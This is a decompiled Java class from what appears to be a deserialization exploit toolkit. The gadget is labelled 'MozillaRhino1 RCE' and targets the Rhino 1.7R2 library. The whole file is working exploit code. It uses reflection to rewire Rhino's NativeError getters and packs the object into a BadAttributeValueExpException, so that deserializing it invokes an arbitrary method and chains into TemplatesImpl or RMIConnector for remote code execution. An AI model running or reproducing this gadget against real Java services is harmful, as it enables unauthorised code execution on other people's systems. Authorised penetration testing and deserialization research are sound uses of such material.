package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.IdScriptableObject;
import org.mozilla.javascript.NativeJavaMethod;
import org.mozilla.javascript.NativeJavaObject;
import org.mozilla.javascript.NativeObject;
import org.mozilla.javascript.ScriptableObject;

@GadgetAnnotation(name = "MozillaRhino1 RCE", description = "调用任意方法", dependencies = {"rhino:js:1.7R2"}, authors = {Authors.MATTHIASKAISER})
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplChain, Tag.RMIConnectorChain})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/other/MozillaRhino1.class */
public class MozillaRhino1 implements Gadget {
    public Object getObject(Object obj, String str) throws Exception {
        Constructor<?> declaredConstructor = Class.forName("org.mozilla.javascript.NativeError").getDeclaredConstructor(new Class[0]);
        Reflections.setAccessible(declaredConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) declaredConstructor.newInstance(new Object[0]);
        NativeObject nativeObject = (NativeObject) Context.enter().initStandardObjects();
        Method declaredMethod = Context.class.getDeclaredMethod("enter", new Class[0]);
        idScriptableObject.setGetterOrSetter("name", 0, new NativeJavaMethod(declaredMethod, "name"), false);
        idScriptableObject.setGetterOrSetter("message", 0, new NativeJavaMethod(obj.getClass().getDeclaredMethod(str, new Class[0]), "message"), false);
        Method declaredMethod2 = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, Integer.TYPE, Integer.TYPE);
        Reflections.setAccessible(declaredMethod2);
        Object invoke = declaredMethod2.invoke(idScriptableObject, "name", 0, 1);
        Field declaredField = invoke.getClass().getDeclaredField("getter");
        Reflections.setAccessible(declaredField);
        Constructor<?> declaredConstructor2 = Class.forName("org.mozilla.javascript.MemberBox").getDeclaredConstructor(Method.class);
        Reflections.setAccessible(declaredConstructor2);
        declaredField.set(invoke, declaredConstructor2.newInstance(declaredMethod));
        idScriptableObject.setPrototype(new NativeJavaObject(nativeObject, obj, TemplatesImpl.class));
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
        Reflections.setFieldValue(badAttributeValueExpException, "val", idScriptableObject);
        Reflections.setFieldValue(badAttributeValueExpException, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(badAttributeValueExpException, "suppressedExceptions", null);
        Reflections.setFieldValue(badAttributeValueExpException, JsonConstants.ELT_CAUSE, null);
        return badAttributeValueExpException;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext), gadgetContext.getString(ContextTag.SPECIAL_METHOD_NAME_KEY));
    }
}
